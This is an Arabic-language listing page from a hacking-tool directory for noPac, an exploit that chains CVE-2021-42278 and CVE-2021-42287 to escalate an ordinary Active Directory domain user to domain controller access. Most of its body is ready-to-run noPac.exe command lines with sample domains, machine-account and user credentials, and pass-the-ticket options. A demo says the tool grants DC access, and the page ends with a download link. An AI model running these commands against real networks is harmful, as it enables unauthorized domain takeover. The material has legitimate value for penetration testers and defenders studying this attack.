Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
noPac — CVE-2021-42287/CVE-2021-42278 مستغل | Kitploit
أدوات/GitHubGitHub/trya9ain/nopac
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراق
GitHubtrya9ain/nopac

noPac

CVE-2021-42287/CVE-2021-42278 مستغل

عرض المستودع
141منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

noPac

يعود أصل هذا المشروع إلى تعلم مبادئ noPac، وقد تم إجراء بعض التعديلات على أساس مشروع cube0x0. تم إضافة تعليقات توضيحية شخصية في الكود المصدر.

  • تم حذف وظيفة Scan، حيث أعتقد شخصياً أن وظيفة Scan غير مفيدة.
  • تم إضافة التحقق من قيمة MachineAccountQuota، فإذا كانت 0 يتم الخروج من البرنامج.
  • تم تحسين معالجة التحقق عند إضافة حساب جهاز كمبيوتر.
  • تم إضافة إخراج TGT.

يمكن الاطلاع على مقالة تحليل الثغرة في مدونتي: تحليل noPac

شروط الاستغلال

noPac هو استغلال مشترك لثغرتين: CVE-2021-42278 (انتحال sAMAccountName) و CVE-2021-42287 (خداع KDC)، ولا يمكن الاستغلال بنجاح إلا إذا تم استيفاء شروط كلتا الثغرتين في نفس الوقت.

طريقة الاستخدام

root@kitploit:~
أمثلة: الحصول على TGT و ST

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs

أمثلة: PTT

  noPac.exe /domain DomainName /dc DomainController /mAccount MachineAccount /mPassword MachineAccountPassword /user DomainUser /pass DomainUserPassword /service altservice /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

  noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

الطريقة الأكثر شيوعاً هي PTT:

root@kitploit:~
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

Demo

قبل استخدام noPac، لا توجد صلاحية الوصول إلى DC.

استخدام noPac.

root@kitploit:~
noPac.exe /domain missyou.com /dc dc.missyou.com /mAccount test1b$ /mPassword "TesT1b13!#@" /user wanglei /pass wanglei /service cifs /ptt

بعد PTT، يمكن الوصول بنجاح إلى DC مرة أخرى من النافذة الحالية.

بيئة الاستغلال

لاحظ أن البرنامج يعمل فقط على الأجهزة المزودة ببيئة .NET 4.0+، حيث يأتي Windows Server 2012 افتراضياً مع .NET 4.0، ويأتي Windows Server 2008 افتراضياً مع .NET 3.5.

لعرض إصدار .NET الموجود على الجهاز:

root@kitploit:~
dir c:\Windows\Microsoft.NET\Framework64

تنزيل الأداة